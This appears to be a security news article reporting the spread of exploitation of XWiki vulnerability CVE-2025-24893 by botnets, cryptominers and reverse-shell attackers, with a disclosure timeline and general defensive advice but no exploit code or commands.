Cybersecurity researchers have observed a dramatic escalation in attacks exploiting a critical XWiki vulnerability, with multiple threat actors now leveraging CVE-2025-24893 to deploy botnets, cryptocurrency miners, and custom malware toolkits.
The vulnerability, initially detected by VulnCheck’s Canary Intelligence system on October 28, 2025, has rapidly evolved from a single attacker’s exploit into a widespread multi-actor campaign.
Within two days of VulnCheck’s disclosure, the flaw was added to CISA’s Known Exploited Vulnerabilities catalog on October 30, triggering an immediate surge in exploitation attempts.
Security analysts have identified numerous distinct attack groups targeting the XWiki flaw. The RondoDox botnet emerged as one of the most aggressive actors, launching its first attacks on November 3, 2025.
| CVE ID | Vulnerability Type | First Exploited | Added to CISA KEV |
|---|---|---|---|
| CVE-2025-24893 | Unauthenticated Command Injection and Remote Code Execution (RCE) | October 28, 2025 | October 30, 2025 |
The botnet’s activity is easily recognizable through its characteristic HTTP User-Agent signatures and payload naming conventions, with secondary payloads typically following the “rondo.
Beyond botnets, cryptocurrency mining operations have heavily exploited the vulnerability. Multiple campaigns have been observed downloading obfuscated payloads that ultimately execute coin mining software on compromised systems.
One particularly sophisticated attack chain involved base64-encoded payloads delivered via domains like ospwrf10ny.anondns[.]net, demonstrating attackers’ efforts to evade detection mechanisms.
Advanced Attack Techniques
Threat actors have employed various exploitation methods, including the deployment of reverse shells for direct system access.
Researchers documented attempts from both cloud infrastructure and potentially compromised devices.
Notably, one reverse shell attack originated from an IP address exposing QNAP and DrayTek interfaces, suggesting the source itself may have been previously exploited through separate vulnerabilities.
The vulnerability has also attracted significant scanner activity, with both automated tools like Nuclei and custom OAST-based scanners probing internet-facing XWiki servers.
This scanning behavior indicates attackers are actively building comprehensive target lists for future exploitation waves.
The rapid progression from initial exploitation to widespread adoption highlights a critical challenge for defenders. By the time CVE-2025-24893 appeared in official vulnerability catalogs, attackers had already gained significant operational advantages.
The expanding infrastructure supporting these attacks, including multiple payload hosting servers and diverse command-and-control networks, demonstrates sophisticated coordination among threat actors.
VulnCheck’s early detection capabilities provided crucial lead time before exploitation became widespread.
The security firm tracked attacks from numerous IP addresses across different countries, revealing a truly global threat landscape spanning multiple continents.
Organizations running XWiki installations should immediately apply available patches and review their systems for indicators of compromise.
Security teams are advised to monitor for unusual network connections, unexpected cryptocurrency mining processes, and suspicious reverse shell attempts targeting vulnerable servers. Regular security audits are strongly recommended.
The CVE-2025-24893 exploitation campaign serves as another reminder that attackers often move faster than traditional disclosure timelines, making early threat detection systems essential for modern defense strategies.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and set GBH as a Preferred Source in Google.